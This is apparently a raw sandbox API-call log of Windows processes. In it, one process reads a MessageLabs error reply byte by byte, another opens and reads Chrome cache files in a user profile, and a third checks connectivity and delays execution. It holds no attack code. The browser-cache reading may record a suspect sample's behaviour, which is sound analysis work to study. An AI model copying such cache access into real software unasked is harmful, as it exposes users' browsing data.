| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => a socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => v socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,412 | 364 | recv |
buffer => i socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,432 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,432 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000009 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => i socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => t socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => w socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => w socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => w socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => . socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | recv |
buffer => m socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,442 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => a socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => g socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => l socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => a socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => b socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,452 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,462 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00 n\x88\x00\xff\xec\xbdyw\xe2\xba\xb2(\xfeU\xb8w\xaf\xb3N\xf7 $\xb6\xb1\x19\x92\xb5\xefz$!\xf3\x9c\x90\xe9\xfe\xce\x1f\xc66\xe0`0\xb1M \xc9\xea\xef\xfe\xd3\xe0A\x92%\xdbL\xbd\xf7y\xebmvw\x83-\x95JR\xa9T\xaa*Uu]\xf3\xf3\xdb\xb1\xc7Ve`\xd9\xfdA\xb0+\xef\x05\xd6<\xa8\xe8\x8e\xdd\x1f\xef:V/ \x7f\xfb\x81\xee\x05\xbfF\xd6xZv\x9d\xf2\xd4\x015\xfd\xa0\xe2\x07\x9f\x8e\xb5;v\xc7\xd6\xaf\xae\xe3\x1a\xc3\xf7\xa9\x1bX\xe5\xf7o\xf4\xaf\xcf\xbe\xd8\xedZ=\xd7\xb3\xca\xc4\x13\xbd\x17X^\xf9=z\xf3\x8e\x1f|\x1b\xee8\xb0\xc6\xc1\xee?\xff\xb9\x17}E\xb0\xec\xb1\xff\x8d\x902-\xc3\xf5\xf4\xc0v\xc7\xf8\x85i9\xa9\x17\xa8o\xc1\xc0s\xa7\xfd\xc1\xaf@\xef:\xd6w\xd7\xf5L\xcb\xab\x18\xae\xe3\xe8\x13\xdf\xda\x8d\xbe\xec\x85/\xfc\x89n\xd8\xe3\xfe\xae\xf4\xcb\x0f<w\xdc/w\xbf{\xa0\xfd\xca FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,492 | 364 | recv |
buffer => . socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => c socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => m socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => / socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => u socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => p socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => p socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,492 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => r socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => t socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => f socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => r socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => m socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,502 | 364 | recv |
buffer => r socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:05,532 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:05,532 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:05,532 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:05,532 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:05,532 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | recv |
buffer => d socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,532 | 364 | recv |
buffer => t socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => a socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => i socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => l socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => a socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => b socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => u socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => t socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,542 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,552 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,552 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00000b DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,552 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,552 | 364 | recv |
buffer => t socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,552 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,552 | 364 | recv |
buffer => h socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => i socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => r socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => r socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => o socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => r socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | recv |
buffer => socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,562 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | recv |
buffer => m socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | recv |
buffer => s socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | recv |
buffer => a socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 364 | recv |
buffer => g socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,572 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xd5\xfdic\xdb\xb6\xd60\x8a~\xf7\xaf\x90\xd9l\x97\xachYv\xd26%\xc3\xe8\xda\x8e\x9d8s\x9c8i\xab\xa8>\x14\xc5A6EM\x94\x1c\x0f\xba\xbf\xfd\xae\x01 \xc1AN\xba\x9f\xe7=\xe7\xdc\xee\x1dS\x04\x01\x10\x04\x16\x16\xd6\xbcv~i\xbc\xfc\xd8\xf8e\xa7\x11\xba\x93a+\x1e\xbb\x03\x7fp\xde\xd6\x83E\xe2\xa5\xc3q\xa2\x9f\x1b\xb7Kw\xd6\xb8\x1a&\x83\xf1\x95\x93F\xc3\xb9\xbd\x81\x05\xb1k\xe3e\xc8\x17\xd7\xb5\xcf[}'k\xe5\x1a\xb73?]\xcc\x92FV\x94\x95\xb8n\xd7\xed\xb5\xdc\xc9$\xbe\xd6\xb1?\xd3\x9d\x85\x8b\x91\x9f\xa4sc\xb5\x82n\x06J7\xa6Wl\xe6x+z\xdf\xf9\xb3\xc5hr\xf4\xcd\xf3'X\xaf\xf0\xde4\x9a\x8d\xaf\x1a\xae\xbd\xb2]\xd7\xe9\xf6\xa0\xc3\xc4u\xf0\xcf\xdd\xdd-v\xff\x8c?\xe2\xbcu\x19\xd4\x8dw9\x1e\x0e\x1a\xedM\xc7qW\xf6\x06\x0c\xc6-T\xc2w{Nz=\xf1\xc7 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,603 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | recv |
buffer => e socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | recv |
buffer => . socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | recv |
buffer =>
socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | select |
socket => 0x000001a1 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | recv |
buffer =>
socket => 0x000001a0 |
SUCCESS | 0x00000001 | |
| 07:44:05,603 | 364 | closesocket |
socket => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:05,623 | 364 | gethostbyname |
Name => thawte.com |
SUCCESS | 0x001641e0 | |
| 07:44:05,623 | 364 | socket |
type => 1 protocol => 6 af => 2 |
SUCCESS | 0x000001c4 | |
| 07:44:05,643 | 504 | NtReadFile |
Buffer => \xfa\xf7\xca#\xdd\xa8\xa0x\xa2\xf3\xd2\xc8O
\x83@_0]JV\xd1kp\x82\xfe\x9ehD&
\x07\x9f\xb5\xde\xf0\x0c\x1dF.@a\xac\x9a@\x14L\x02j\xcd\x1b\x18\x93e\xd2b\x0c\xe2'\xba\xcb\xca\xca&\xcfdB\xb0\xe6X_\x1bN\x8dI\x06
\xf98\x16\x11\x0c\x86\xb0\x8f\xddkG\xa3\x00\x7fX\x0c\x0cg\xee\xf8\x93\xf5#\x7f\x88\x9eP\x1d\x02d\xe3a4\x8c\xd1\xf2\xce\x96$\x80\x88\x87\xceY\xc4L (\xb3\x86\xf6\x86\xcbz#|\xf7\xd5l\x88agh\x1c\x9c\x15=3\x08F\xf1\xe0\xc9h\xe4\x0f\xd0\xe7Dk\x16,^9\xd0g}\xb8K\xaf\x18\xe9\xd2\x14\xfc\x08\xec\xaa2\x1b.\x03k\xa0\x0f\xadK2x\xf2\xd3D GS\xc1\xdd\xd68\x11\xc0\x0e+n\xb2\x0c\xd9\xab\xb18\x17\x95(\x99\xd6\xae\x103S\x07\x993)\xde\xedqHF\xb1\x9a*\xd7\xe4\xa9\xcb\xac\x93\xe7/@\x14\xd9P\xd5Z\xc0H\x8cIv\xa7&j\xda\x81\xda\x08\xe14 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,653 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,653 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00000c DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,663 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xad}iC\xdb\xc8\x96\xe8\xf7\xfc
\xa3\x9b\xa1\xa5\xb60&I\xf7\xedXQ<@X\xd2 \x81\x00Y
\xed\x11\xb2\x16c!\x1b[\xc6f\xf1\x7f\x7fg\xa9*\x95d\x91\xe4\xce\x9b^\xb0T\xaa}9\xfb9\xb5\xfe{\xed\xef\x93\xda\xef\xeb\xb5\xc8\x1b\xf5\x1b\xc9\xd0\xeb\x05\xbd\xee\x86\x19NS?\xeb\x0fS\xb3k\xdd\xdfx\xe3\xda\xac\x9f\xf6\x8637\x8b\xfb\x13\xe7I\xb7\xb1\x9b\xba*\x87u?\x0e\xb2\xe98\xad\x1dxY\xdc\x08\x93\xe1pl\x9ai0\xab\xbd\xf1\xb2\xc0jDAv\xda\xbf
Lk}c\xe7\xb9\xb5p\xb0\xb6\x83m\xfay\xbf\xedt\x1b\x9f/\xf3\xaa<\xdb\xb7\xee\xb1\x8d\xc6\x96\xebQ\x96\xd0\xf5\x1f\x1e\xee\x17\x0e%\x1e\xb8acw\xcc\xcf{\xf0\xdc\x1b^y\xfd\x94\xdfc\x0f\x12F\xd0\x03~\xbd\xc6\xd7\xd9\x9b\x85\xf3~\xdb]\xff\xa7\xb3V_\xef\xba\x8d\xd6\xc3\x7f\xadzkw\x9bk\xdf\x9bk/\xff\xfb\xfc\xf7\xa7\xeb FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,713 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,713 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00000f DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,713 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xad\xbdg{\xdbF\xd3(\xfc]\xbf\x82B|+@\xb8\xa2H\xd9i\x84`>j\xb6e\xab8*.\xa1y\xfb,\x80\x05H\x89\xbdH\x96%\xfe\xf7wf\xb6`\x01BN\x9e\xf3\x9e\\x8e\x08l\xc3\xd6\xd9\xe93\x9f\xde?\xac\xdd\xf2ie\xec'\x8ba4\xef\x8d\x86\x15\xce]\xee=L\xc5|1\x1dVt\xaakRB\xde\xe6\x9d\x1a\x1f\x8f\xfb\xf7\xee\xbc\xdb\x9b1>M\x17\x031\x9c\xcf\xbc\xe5\x12\x9b
y\xd0\xee\xf8\xf8\xf4\x89\x07\x9f\xf8\xe3\xe3\xc3\x92\xdd\x05TT\xf0\xc04\x98}\xe3v\xd4\x8b+\xf5\xf5 \xe0K\x96\xd8%X\xe8=$\xa3\xa9\x8bmE\x01\xaf\xcd\xc6\xfd\xde\xdcuj\x8e\xc7\xe2 ||\xbcc\xc2\x17AT\x9bu{\xc9\xdc\xf5|\xaf\x97\xb8\xc3E\xbf\xbf\x1e\xc4m\xd1\xf1b\xfa\xf1E\x7f&*\xeaS\x98\xeb\xab\xe7x\xc9.\xc2\xc0\x1a\xe0\x92u\xf3\xfd\xa3\xd1\x04\xf3\xfb\xb1\x18%\x15\xeeC\xeb\xce(\xbc\x16 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,763 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,773 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000011 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,783 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xed}k[\xdb\xc8\xd2\xe0w~\x05h&\x8e\x14\x0bc.\xc9$6\x1d^\x02$a\x86\x84\x0c\x90\xb9\x19\x87G\x96d[X\xb6\x8cds f\x7f\xfbVU_%\xcb\x903{\x9e\xdd/;\xe7\x04\xab\xab\xab\xab\xbb\xab\xab\xab\xabo\xd57\xd1(HnZ\xcf/...\xb3\xf8y{\x99-\xdf\x14A\xb3\xd9\xf2\xfdC\xd3.\xc2[\xcf\xfd\x88\x12,\x8a\x81t\xad\xb6\xe3\xd4\xc6\xd3\xaco\xdf[\xe9\xd8\xb7\x1a\xf7\x96\x9f\x0c\x87\xa77]\xaba\xad\xad\xdd\x8e\xfdZ/Izq8\xcd\xc2\xd4OF\x93p4\xa9\x01\xc6Z\xcf\x0bz\xe1$#\x8c\x0c\xb0]k\xece\xd9I\xd8
\xd34L!\xf1x\xc3o\M\xc3\xf4\x8e\xa2RHw\x12\xc6\xde\xdd\xd74F\xca\x90\xd7E\x8a\xe1Z\x7f2\x8c\xad\x07\x17\xb2M\xc3Z\x94` .\xb3d\xf4%Mn%\xf2\xda\xb3~\x92M\x9e\xa9<\x87\xde < \x81x6A\xe2&\xe6\xcd FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,823 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,823 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000012 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,833 | 504 | NtReadFile |
Buffer => RIFF\x90f\x00\x00WEBPVP8L\x83f\x00\x00/U\x80t\x12\xd5
